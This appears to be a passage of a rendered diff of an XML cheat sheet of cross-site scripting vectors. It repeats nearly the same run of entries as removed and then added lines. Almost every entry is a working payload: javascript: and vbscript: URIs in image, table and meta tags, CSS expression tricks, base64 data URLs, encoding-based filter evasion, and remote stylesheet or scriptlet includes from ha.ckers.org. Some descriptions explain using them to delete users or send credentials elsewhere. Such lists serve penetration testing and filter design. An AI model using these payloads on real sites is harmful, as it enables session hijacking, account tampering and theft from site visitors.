+ <desc>Image XSS using the JavaScript directive.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG No Quotes/Semicolon</name>
+ <code><IMG SRC=javascript:alert('XSS')></code>
+ <desc>No quotes and no semicolon</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG Dynsrc</name>
+ <code><IMG DYNSRC="javascript:alert('XSS');"></code>
+ <desc>IMG Dynsrc</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG Lowsrc</name>
+ <code><IMG LOWSRC="javascript:alert('XSS');"></code>
+ <desc>IMG Lowsrc</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG Embedded commands 1</name>
+ <code><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></code>
+ <desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG Embedded commands 2</name>
+ <code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</code>
+ <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG STYLE w/expression</name>
</ins><span class="cx" style="display: block; padding: 0 10px"> <code>exp/*<XSS STYLE='no\xss:noxss("*//*");
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></code>
- <desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>List-style-image</name>
- <code><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</code>
- <desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG w/VBscript</name>
- <code><IMG SRC='vbscript:msgbox("XSS")'></code>
- <desc>VBscript in an image</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>LAYER</name>
- <code><LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER></code>
- <desc>Layer (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>Livescript</name>
- <code><IMG SRC="livescript:[code]"></code>
- <desc>Livescript (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>US-ASCII encoding</name>
- <code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
- <desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>]</browser>
- </attack>
- <attack>
- <name>META</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></code>
- <desc>The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>META w/data:URL</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code>
- <desc>This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>META w/additional URL parameter</name>
- <code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></code>
- <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Mocha</name>
- <code><IMG SRC="mocha:[code]"></code>
- <desc>Mocha (Older Netscape only)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>OBJECT</name>
- <code><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></code>
- <desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>OBJECT w/Embedded XSS</name>
- <code><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT></code>
- <desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Embed Flash</name>
- <code><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></code>
- <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>OBJECT w/Flash 2</name>
- <code>a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);</code>
- <desc>Using this action script inside flash can obfuscate your XSS vector.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE</name>
- <code><STYLE TYPE="text/javascript">alert('XSS');</STYLE></code>
- <desc>STYLE tag (Older versions of Netscape only)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/Comment</name>
- <code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></code>
- <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/Anonymous HTML</name>
- <code><XSS STYLE="xss:expression(alert('XSS'))"></code>
- <desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/background-image</name>
- <code><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></code>
- <desc>STYLE tag using background-image.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>STYLE w/background</name>
- <code><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code>
- <desc>STYLE tag using background.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Stylesheet</name>
- <code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code>
- <desc>Stylesheet</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Remote Stylesheet 1</name>
- <code><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></code>
- <desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Remote Stylesheet 2</name>
- <code><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></code>
- <desc>Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Remote Stylesheet 3</name>
- <code><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></code>
- <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Remote Stylesheet 4</name>
- <code><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></code>
- <desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>TABLE</name>
- <code><TABLE BACKGROUND="javascript:alert('XSS')"></TABLE></code>
- <desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>TD</name>
- <code><TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE></code>
- <desc>TD background.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XML namespace</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></code>
+ <desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>List-style-image</name>
+ <code><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</code>
+ <desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG w/VBscript</name>
+ <code><IMG SRC='vbscript:msgbox("XSS")'></code>
+ <desc>VBscript in an image</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>LAYER</name>
+ <code><LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER></code>
+ <desc>Layer (Older Netscape only)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>Livescript</name>
+ <code><IMG SRC="livescript:[code]"></code>
+ <desc>Livescript (Older Netscape only)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>US-ASCII encoding</name>
+ <code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
+ <desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>META</name>
+ <code><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></code>
+ <desc>The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>META w/data:URL</name>
+ <code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code>
+ <desc>This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>META w/additional URL parameter</name>
+ <code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></code>
+ <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Mocha</name>
+ <code><IMG SRC="mocha:[code]"></code>
+ <desc>Mocha (Older Netscape only)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>OBJECT</name>
+ <code><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></code>
+ <desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>OBJECT w/Embedded XSS</name>
+ <code><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT></code>
+ <desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Embed Flash</name>
+ <code><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></code>
+ <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>OBJECT w/Flash 2</name>
+ <code>a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);</code>
+ <desc>Using this action script inside flash can obfuscate your XSS vector.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE</name>
+ <code><STYLE TYPE="text/javascript">alert('XSS');</STYLE></code>
+ <desc>STYLE tag (Older versions of Netscape only)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/Comment</name>
+ <code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></code>
+ <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/Anonymous HTML</name>
+ <code><XSS STYLE="xss:expression(alert('XSS'))"></code>
+ <desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/background-image</name>
+ <code><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></code>
+ <desc>STYLE tag using background-image.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>STYLE w/background</name>
+ <code><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code>
+ <desc>STYLE tag using background.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Stylesheet</name>
+ <code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code>
+ <desc>Stylesheet</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Remote Stylesheet 1</name>
+ <code><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></code>
+ <desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Remote Stylesheet 2</name>
+ <code><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></code>
+ <desc>Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Remote Stylesheet 3</name>
+ <code><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></code>
+ <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Remote Stylesheet 4</name>
+ <code><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></code>
+ <desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>TABLE</name>
+ <code><TABLE BACKGROUND="javascript:alert('XSS')"></TABLE></code>
+ <desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>TD</name>
